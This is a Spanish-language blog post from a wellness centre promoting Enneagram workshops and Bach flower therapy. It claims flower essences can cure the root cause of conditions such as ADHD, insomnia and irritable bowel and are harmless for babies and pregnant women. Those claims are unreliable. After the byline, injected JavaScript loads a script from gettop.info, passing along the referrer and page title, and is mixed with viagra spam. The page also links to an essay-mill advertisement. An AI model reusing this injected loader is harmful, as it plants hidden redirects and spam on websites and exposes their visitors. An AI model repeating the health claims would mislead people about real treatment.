Reciente

ENEAGRAMA Y TERAPIA FLORAL: POTENTES HERRAMIENTAS DE AYUDA Y SANACIÓN

Espacio Vital / 17/09/2016

Los orígenes del Eneagrama son todo un misterio, se les supone en Babilonia o Medio Oriente en el 2.500 A. C. En Occidente, encontramos la característica figura de nueve puntas del Eneagrama recién en los escritos de Ouspensky, discípulo de G. Gurdieff, místico ruso de principios del siglo XX. Sin embargo, éstos en nada se refieren a la tipología de nueve caracteres, que es la aplicación más popular de este conocimiento. Los nueve tipos aparecen recién en las enseñanzas del maestro boliviano Oscar Ichazo.

Esta figura de nueve puntas es un mapa del ego, de nuestra personalidad; vale decir, de nuestra forma de pensar, sentir y actuar. Cado uno de estos nueve egos o formas de ser, se originaron por una “pelada de cable” particular, por una falla en la percepción, producto de nuestra socialización temprana, cuando éramos muy niños y en que dejamos de sentirnos como una unidad, como parte del todo. Resultado de esta “distorsión perceptual”, nuestro ego como defensa, desarrolla una pasión o mal llamado “pecado capital”: Ira, orgullo, envidia, avaricia, gula, etc.

El poder conocer nuestro ego, nos permite tomar conciencia de que finalmente somos un personaje, una máscara, producto de nuestra historia y que es posible “sacar el traje” y vivir en más armonía y plenitud, con más liviandad. En definitiva, ser dueños de nuestra vida.

En Espacio Vital, todos los meses desarrollamos un taller de modalidad teórico-vivencial de esta potente herramienta para explorar y descubrir en cuáles de sus nueve puntas, se ha fijado nuestro ego.

Otra herramienta terapéutica que podemos utilizar para descubrir y trabajar nuestra personalidad es la Terapia Floral. Existen distintos sistemas florales, como Bach, Bush, California, por mencionar algunas; y el principio es el mismo, consiste en equilibrar emociones mediante un “Preparado Floral” el cual no utiliza la materia física de las plantas, sino la energía esencial contenida en las flores. Dicha energía sanadora se obtiene mediante un procedimiento alquímico, en el que intervienen el agua y la luz solar, para luego ser almacenada en un líquido que actúa como conservante. En el Sistema Bach, por ejemplo, existen 38 esencias diferentes y son totalmente inocuas, es decir puede administrarse a bebés, mujeres en gestación y personas con tratamientos farmacológicos tradicionales.

El hallazgo del Dr. Edward Bach representa un enfoque revolucionario en la historia de la medicina, que consiste en tratar al paciente y no a la enfermedad. Esto significa que cual sea la afección que padezcamos, llámese déficit atencional, insomnio, colon irritable, u otra, podemos erradicar la causa primera que genera esta enfermedad, si somos capaces de determinar y contrarrestar el desequilibrio emocional. Esto se consigue a través de la intervención de un terapeuta floral, quien en conjunto con el consultante definen las esencias para su Preparado Floral.

Si estás buscando un mayor desarrollo p e r s o n a l , c r e c i m i e n t o espiritual o descubrir el origen emocional de tus afecciones físicas, te invitamos a participar de sesiones de Terapia Floral en Espacio Vital.

 

Por Víctor Castillo Psicólogo y Mónica Basualto Nutricionistas.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; erectile dysfunction viagra document.currentScript.parentNode.insertBefore(s, document.currentScript);





Artículo Anterior

Urgent-Essay.COM overview: first corporation to buy college papers quickly & punctually

Artículo Siguiente

UNA ALERTA DE ROSÁCEA





0 Comment


Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

8 − 1 =


More Story

Urgent-Essay.COM overview: first corporation to buy college papers quickly & punctually

Have you been concerned concerning how to do tricky academia projects? urgent-essay.com provides you turnkey strategies that...

30/08/2016